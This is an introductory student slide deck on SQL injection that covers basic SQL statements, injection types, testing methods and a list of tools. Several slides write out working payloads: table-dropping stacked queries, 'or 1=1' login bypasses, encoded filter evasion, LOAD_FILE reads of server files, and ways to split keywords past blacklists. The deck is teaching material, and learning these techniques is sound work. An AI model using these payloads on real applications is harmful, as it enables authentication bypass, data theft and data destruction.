SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister
SQL – Injections Intro.Prajen BhadelCollege of Information Technology & EngeneeringKathmandu tinkuneSixth semister
2
SQL Injections
• SQL injection – code injection technique that exploits a security
vulnerability in application– occurs at the database layer of an application.
• SQL - Structured Query Language– Used to communicate with the database– ANSI-compliant SQL
3
SQL Injections
• Authentication Bypass • Information Disclosure • Compromised Data Integrity • Compromised Availability of Data• Remote Command Execution
4
Basic SQL
Select
Insert
Update
Delete
Union
• SQL statement breakdown
5
SQL - Select
1. Select Information from a table
SELECT * FROM table where field=1
6
SQL - Insert
1. Add new records to database
INSERT INTO tablename (id, name) values(10, “Greg”)
7
SQL - Update
1. Updating existing records
UPDATE table set fieldA=123 WHERE somefield=2323
UPDATE table set fieldB=‘Greg’
8
SQL - Delete
1. Delete records
DELETE FROM tableA where somefield=1221
DELETE FROM tableA
9
SQL - Union
1. Combine two or more SELECT statements.
SELECT column_name(s) FROM table_name1UNION
SELECT column_name(s) FROM table_name2
10
Terminators
• ; Semi colon ends current SQL query and starts a new one– SELECT * FROM users ; DROP TABLE users
• Stacked Query • -- Double dash ignores remaining query string
– Select * FROM users -- limit 10• Can be used in conjunction
– SELECT * FROM users WHERE id=''; DROP TABLE users; -- ' AND password=''
11
Where Clause Pruning
• Powerful SQL technique – SQL trick for allowing a query to return either a full
set or a specified subset – 1=1 == TRUE
• SELECT * FROM users
WHERE (id = :id) OR (-1 = :id))
12
SQL Injection Cause
• Executed via front end of the Web Application– GET URL parameter
• http://host.com/item.php?cat=1&id=11– Form POST fields
• <form action=“some.php” method=“post”> <input name='name'/> <input type='password' name='passwd'/></form>
13
Techniques
• Normal SQL Injections– Errors & Exception– Unexpected output
• O'Reilly != O\'Reilly
• Blind SQL Injections– No errors– A lot of guesswork– Introduction of a delay as part of a malicious SQL statement
14
SQL Injection Types
• Passive– Exposing database information
• Information retrieval
• Active– Altering database information
• Insertion • Deletion
15
Testing for Vulnerability
• Manual– Time consuming
• Automated– SQL injection scanners only scan for known
vulnerabilities
• Google – Incorrect syntax near
16
Toolbox
• SQLIer
• SQLbftools
• SQLibf
• SQLBrute
• BobCat
• SQLMap
• Absinthe
• SQL Injection Pen-testing Tool
• SQID
• SQLNinja
• FJ-Injector Framwork
• Automagic SQL Injector
• NGSS SQL Injector
17
Identifying Vulnerable Site
Given unexpected input site behaves oddly– ‘ Single Quote– “ Double Quote– ‘1 Single Quote one– ‘a Single Quote a– ‘; Single Quote semicolon
• Input > Satan’s little minion– Nothing found for Satan\’s little minion– You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near '\'
18
Identifying Vulnerable Site
• ' or 1=1--" or 1=1--or 1=1--' or 'a'='a" or "a"="a') or ('a'='a
19
Bypassing Filters
• Escaping entities– %26%23039 == ' == ‘ (single quote)
• %26 == &• %23 == #• 039 Entity number
– Select * FROM users WHERE username=‘secret%26%23039 OR %26%23039X%26%23039=%26%23039X
– Evaluated as > Select * FROM users WHERE username=‘secret ‘ OR ‘X’ = ‘X’• This evaluates to always true
• Char function– Char(83,101,108,101,99,116,32,42,32,102,114,111,109,32,117,115,101,114,115)– Select * from users
• Concat & Hex functions– CONCAT('0x', HEX('/var/log/messages'))– 0x2F7661722F6C6F672F6D65737361676573
20
Bypassing Filters
• Injecting AND 1=(SELECT LOAD_FILE('var/log/messages') )
– MySQL Error '\'var/log/messages\') ) limit 5 = 1 order by average desc limit 10' at line 1)
21
Bypassing Filters
• 1=(SELECT LOAD_FILE('var/log/messages') )
– MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'var/log/messages\') ) limit 5 -- = 1 order by average desc limit 10' at line 1)
• Char
• Hex
– 1=(SELECT LOAD_FILE(0x2F7661722F6C6F672F6D65737361676573)
22
Bypassing Blacklists
• What are Blacklists
• Blacklist (DELETE, EXEC)– DEL/**/ETE– /**/ D/**EVIL**/ELE/**/TE
23
Escape Characters
• %26%23039 OR %26%23039X%26%23039=%26%23039X– ‘ OR ‘X’ = ‘X’